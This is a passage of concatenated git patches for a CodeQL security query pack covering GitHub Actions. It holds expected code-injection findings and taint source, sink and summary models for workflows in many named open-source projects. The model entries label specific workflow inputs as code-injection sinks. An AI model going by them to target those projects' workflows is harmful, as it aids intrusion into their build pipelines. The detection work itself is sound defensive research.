github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 35b27172db67..ec9a5e5238a9 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -236,8 +236,6 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From d1a4d18fca36aab804ce643d14db1c246c34c7c3 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 16 Apr 2024 21:33:50 +0200 Subject: [PATCH 175/707] Add composite actions summaries and sources --- .../apache_incubator-kie-tools.model.yml | 6 ++++++ .../aws-powertools_powertools-lambda-python.model.yml | 6 ++++++ .../composite-actions/drawpile_drawpile.model.yml | 7 +++++++ .../elastic_apm-server.model copy.yml | 7 +++++++ .../composite-actions/flagsmith_flagsmith.model.yml | 6 ++++++ .../googlecloudplatform_dataflowtemplates.model.yml | 11 +++++++++++ .../composite-actions/hashicorp_vault.model.yml | 8 +++++++- .../jhipster_generator-jhipster.model.yml | 7 ++++++- .../composite-actions/linkerd_linkerd2.model.yml | 9 ++++++++- .../generated/composite-actions/novuhq_novu.model.yml | 7 ++++++- .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++- .../generated/composite-actions/saltstack_salt.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- 13 files changed, 88 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml create mode 100644 ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.yml diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml new file mode 100644 index 000000000000..37f3efbededb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml new file mode 100644 index 000000000000..6dffbff40d31 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml new file mode 100644 index 000000000000..63085c045d0a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] + - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml new file mode 100644 index 000000000000..023abac3631d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] + - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml new file mode 100644 index 000000000000..37e1d0d67a5e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml new file mode 100644 index 000000000000..ab1cac6b6919 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index bcd6e0eda315..ba213f0363bb 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -4,4 +4,10 @@ extensions: extensible: sinkModel data: - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] - - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] + - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index 6dd3ac94306a..f1b5e6df222e 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -19,4 +19,9 @@ extensions: - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] \ No newline at end of file + - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 234f13b73871..e86f7432a48a 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -6,4 +6,11 @@ extensions: - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] \ No newline at end of file + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index f305e2a37b34..48203004ed58 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -3,4 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 8b45d92a5e0e..3122d89f28f8 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -4,4 +4,9 @@ extensions: extensible: sinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"] - - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml new file mode 100644 index 000000000000..963518a34784 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index b56944cd0ff7..21ea7ef13a98 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -3,4 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] From 463a7a60629eda2e88024ff90b40babdd5ae6bb8 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 16 Apr 2024 21:33:59 +0200 Subject: [PATCH 176/707] Add resuable workflow summaries and sources --- ...dposse_github-action-matrix-outputs-write.model.yml | 6 ++++++ .../element-hq_element-desktop.model.yml | 7 ++++++- .../reusable-workflows/envoyproxy_envoy.model.yml | 7 +++++++ .../hashgraph_hedera-services.model.yml | 7 +++++++ .../reusable-workflows/hashicorp_vault.model.yml | 8 +++++++- .../reusable-workflows/hitobito_hitobito.model.yml | 10 +++++++++- .../reusable-workflows/kubeshop_botkube.model.yml | 7 ++++++- .../reusable-workflows/neondatabase_neon.model.yml | 7 +++++++ .../reusable-workflows/puppeteer_puppeteer.model.yml | 6 ++++++ .../streetsidesoftware_cspell.model.yml | 7 ++++++- .../reusable-workflows/tencent_hippy.model.yml | 8 +++++++- .../reusable-workflows/zitadel_zitadel.model.yml | 7 ++++++- 12 files changed, 80 insertions(+), 7 deletions(-) create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml new file mode 100644 index 000000000000..69667ce10b10 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 849a531cd7bc..9f7298797233 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -8,4 +8,9 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml new file mode 100644 index 000000000000..2a9e2f9fd1ab --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] + - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml new file mode 100644 index 000000000000..c9c7e8318f7e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] + - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index f9b7785cab96..d8be4cc11b91 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -13,4 +13,10 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] - - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] + - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e263590260ff..e8c98ab4576a 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -4,4 +4,12 @@ extensions: extensible: sinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] - - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] \ No newline at end of file + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_name", "taint", "manual"] + - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.project", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 50bbdaf8153d..819f9f0e35d8 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -4,4 +4,9 @@ extensions: extensible: sinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] \ No newline at end of file + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml new file mode 100644 index 000000000000..3b8a83bc8c64 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] + - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml new file mode 100644 index 000000000000..0d96077345f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 74bdcb807c88..0c5427134309 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -3,4 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] \ No newline at end of file + - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index 82f5ba4be74d..b5d1263f743f 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -6,4 +6,10 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"] - - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] \ No newline at end of file + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] + - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 26f9f659a2d9..f7ee9b66305b 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -6,4 +6,9 @@ extensions: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] From 764f6fbc0d691b47b85f361da1f93f642b7d4a59 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 16 Apr 2024 21:35:30 +0200 Subject: [PATCH 177/707] Fix "inputs" models typo --- ...ctions_actions-runner-controller.model.yml | 18 +++---- .../composite-actions/adap_flower.model.yml | 8 ++-- .../agoric_agoric-sdk.model.yml | 12 ++--- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 4 +- .../amazon-ion_ion-java.model.yml | 4 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 10 ++-- .../ansible_ansible-lint.model.yml | 4 +- .../composite-actions/ansible_awx.model.yml | 4 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 4 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 24 +++++----- .../composite-actions/apache_camel.model.yml | 12 ++--- .../composite-actions/apache_flink.model.yml | 10 ++-- .../composite-actions/apache_nuttx.model.yml | 6 +-- .../apache_opendal.model.yml | 8 ++-- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 14 +++--- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 4 +- .../aptos-labs_aptos-core.model.yml | 6 +-- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 18 +++---- .../auth0_auth0-java.model.yml | 8 ++-- .../auth0_auth0.net.model.yml | 6 +-- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 10 ++-- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 4 +- .../aws_karpenter-provider-aws.model.yml | 4 +- .../awslabs_amazon-eks-ami.model.yml | 14 +++--- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 4 +- .../azure_azure-datafactory.model.yml | 4 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 10 ++-- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 6 +-- .../braintree_braintree_android.model.yml | 8 ++-- .../broadinstitute_gatk.model.yml | 6 +-- .../canonical_multipass.model.yml | 4 +- .../chia-network_actions.model.yml | 12 ++--- .../chia-network_chia-blockchain.model.yml | 2 +- 